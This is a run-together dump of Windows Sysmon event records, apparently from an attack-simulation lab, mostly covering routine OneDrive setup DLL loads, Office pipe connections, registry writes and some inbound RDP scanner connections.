Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:58:09.404 11241100x800000000000000078587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.342{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:58:09.342 11241100x800000000000000078586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.342{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ipcsecproc.dll2021-04-20 14:58:09.342 11241100x800000000000000078585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.326{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:58:09.326 11241100x800000000000000078584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.326{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:58:09.295 11241100x800000000000000078583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.279{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:58:09.279 11241100x800000000000000078582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.279{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:58:09.279 11241100x800000000000000078581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.279{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:58:09.279 11241100x800000000000000078580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.264{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\microsoft.office.irm.pdfprotector.dll2021-04-20 14:58:09.264 18141800x800000000000000078579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.264{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:58:09.264 11241100x800000000000000078576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.264{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-file-l1-1-0.dll2021-04-20 14:58:09.248 18141800x800000000000000078575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.185{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-errorhandling-l1-1-0.dll2021-04-20 14:58:09.154 11241100x800000000000000078568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.185{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-util-l1-1-0.dll2021-04-20 14:58:09.185 18141800x800000000000000078567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.154{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5PrintSupport.dll2021-04-20 14:58:09.014 18141800x800000000000000078565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.154{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000050493Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:09.431{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41F357CED8344871CAD1146F5EA6FA0,SHA256=5AD5E05359B6BF555C9E14D3FFAB53047D5788B3CFC8CD63C8768D662E2EE8ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050492Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:09.399{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A65A6586786295FED6AE64AB7993B4C,SHA256=3618D4E3EF2634C903278B143DEE418E837D471C1D95E9891F4376A98C12B993,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050491Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:07.916{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49764-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050490Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:07.749{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com51689-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050489Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:07.232{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64956-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050488Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:06.850{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52532-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 11241100x800000000000000078682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.982{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\libeay32.dll2021-04-20 14:58:10.982 10341000x800000000000000078681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:10.982{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14004968C:\Windows\system32\msiexec.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19dedd|C:\Windows\system32\Msi.dll+2ea6e|C:\Windows\system32\Msi.dll+474c5|C:\Windows\system32\Msi.dll+10a3b5|C:\Windows\system32\Msi.dll+1095d6|C:\Windows\system32\Msi.dll+f3bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.967{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\WnsClientApi.dll2021-04-20 14:58:10.967 18141800x800000000000000078678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.935{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.810{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-processthreads-l1-1-0.dll2021-04-20 14:58:10.795 18141800x800000000000000078674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.779{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:58:10.763 18141800x800000000000000078671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.763{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-processenvironment-l1-1-0.dll2021-04-20 14:58:10.732 18141800x800000000000000078668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.732{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:58:10.732 10341000x800000000000000078659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:10.732{A7A01FEF-B626-607E-1400-00000000BB01}12763692C:\Windows\system32\svchost.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.717{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-namedpipe-l1-1-0.dll2021-04-20 14:58:10.717 18141800x800000000000000078653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.717{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-memory-l1-1-0.dll2021-04-20 14:58:10.717 10341000x800000000000000078650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:10.592{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC01-607E-340E-00000000BB01}6180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 13241300x800000000000000078647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000078646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00d2837a) 13241300x800000000000000078645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ed-0x32311b65) 13241300x800000000000000078644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f5-0x93f58365) 13241300x800000000000000078643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0xf5b9eb65) 13241300x800000000000000078642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000078641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00d2837a) 18141800x800000000000000078640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 13241300x800000000000000078639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ed-0x32117379) 13241300x800000000000000078638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f5-0x93d5db79) 13241300x800000000000000078637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:10.420{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0xf59a4379) 11241100x800000000000000078636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.404{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5Quick.dll2021-04-20 14:58:10.404 18141800x800000000000000078635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 